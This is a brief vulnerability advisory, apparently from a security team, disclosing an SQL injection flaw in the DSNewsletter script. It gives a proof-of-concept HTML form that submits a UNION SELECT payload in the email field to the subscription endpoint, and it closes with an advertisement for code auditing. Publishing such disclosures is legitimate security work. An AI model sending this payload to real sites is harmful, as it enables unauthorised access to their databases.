PoC/Exploit for SQL Injection Vulnerability in DSNewsletter

Published Proof of Concept code - SQL Injection Vulnerability in DSNewsletter.

Description
Available
Solution
Not available - check vendor's website

SQL Injection example:


<form action=http://[host]/dsnews/index.php?open=newsletter method=post>
<input name=email value="asd' union select 1,2,3,4,5/*">
<input name=choice value=sub>
<input type=submit name=submit value=Send>
</form>

Order Source Code Test made by eVuln team

Protect your website by source code testing of your site done by our team.The work will be done by specialists in website security.

Advisories by vuln type